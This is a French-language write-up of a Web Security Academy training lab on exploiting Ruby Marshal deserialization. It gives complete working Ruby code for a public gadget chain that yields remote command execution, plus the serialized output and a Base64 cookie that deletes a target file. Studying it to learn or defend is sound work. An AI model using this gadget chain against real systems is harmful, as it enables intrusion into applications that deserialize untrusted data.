Désérialisation Ruby avec gadget documenté

Exploiting Ruby deserialization using a documented gadget chain

Lab: Exploiting Ruby deserialization using a documented gadget chain | Web Security AcademyWebSecAcademy

Contexte du laboratoire

Ce laboratoire utilise un mécanisme de session basé sur la sérialisation et repose sur le framework Ruby on Rails. Il existe des chaînes de gadgets publiquement documentées permettant d’obtenir une exécution de code à distance (RCE) via Marshal.

Objectif : Créer un objet sérialisé malveillant, l’injecter dans le cookie de session et supprimer le fichier :

/home/carlos/morale.txt

Identifiants fournis :

wiener : peter

Analyse de la session

Après authentification, le serveur fournit un cookie de session sérialisé en Base64 :

BAhvOglVc2VyBzoOQHVzZXJuYW1lSSILd2llbmVyBjoGRUY6EkBhY2Nlc3NfdG9rZW5JIiV6YmI1YWVjejlrZXJzajU3bHZsanloaXQyanR6aTNsMgY7B0YK

Cela indique clairement l’utilisation de Marshal.dump côté serveur.

Universal Deserialisation Gadget for Ruby 2.x-3.xdevcraft.io

Une chaîne de gadgets documentée basée sur les classes Ruby suivantes est utilisée :

Gem::SpecFetcher
Gem::Installer
Gem::Requirement
Gem::RequestSet
Net::WriteAdapter
Gem::Package::TarReader

Cette chaîne permet de déclencher un appel à Kernel.system.

Construction du payload Ruby

Le code suivant permet de créer un objet sérialisé exécutant la commande ciblée :

# Autoload the required classes
Gem::SpecFetcher
Gem::Installer

# prevent the payload from running when we Marshal.dump it
module Gem
  class Requirement
    def marshal_dump
      [@requirements]
    end
  end
end

wa1 = Net::WriteAdapter.new(Kernel, :system)

rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "rm /home/carlos/morale.txt")

wa2 = Net::WriteAdapter.new(rs, :resolve)

i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")


n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)

t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)

r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)

payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts payload

Online Ruby (2.7.0) Playgroundplayground.masteringbackend.com

[cGem::SpecFetchercGem::InstallerU:Gem::Requirement[o:Gem::Package::TarReader:@ioo:Net::BufferedIO;o:#Gem::Package::TarReader::Entry:
@readi:@headerI"aaa:ET:@debug_outputo:Net::WriteAdapter:@socketo:Gem::RequestSet:
@setso;;mKernel:@method_id:system:
@git_setI"rm /home/carlos/morale.txt;T;:resolve

Encodage en Base64

Pour pouvoir injecter le payload dans le cookie de session, il est encodé en Base64 :

puts Base64.encode64(payload)

Chaîne finale obtenue :

BAhbCGMVR2VtOjpTcGVjRmV0Y2hlcmMTR2VtOjpJbnN0YWxsZXJVOhVHZW06OlJlcXVpcmVtZW50WwZvOhxHZW06OlBhY2thZ2U6OlRhclJlYWRlcgY6CEBpb286FE5ldDo6QnVmZmVyZWRJTwc7B286I0dlbTo6UGFja2FnZTo6VGFyUmVhZGVyOjpFbnRyeQc6CkByZWFkaQA6DEBoZWFkZXJJIghhYWEGOgZFVDoSQGRlYnVnX291dHB1dG86Fk5ldDo6V3JpdGVBZGFwdGVyBzoMQHNvY2tldG86FEdlbTo6UmVxdWVzdFNldAc6CkBzZXRzbzsOBzsPbQtLZXJuZWw6D0BtZXRob2RfaWQ6C3N5c3RlbToNQGdpdF9zZXRJIh9ybSAvaG9tZS9jYXJsb3MvbW9yYWxlLnR4dAY7DFQ7EjoMcmVzb2x2ZQ==

Mis à jour il y a 2 mois

hashtagExploiting Ruby deserialization using a documented gadget chain

Exploiting Ruby deserialization using a documented gadget chain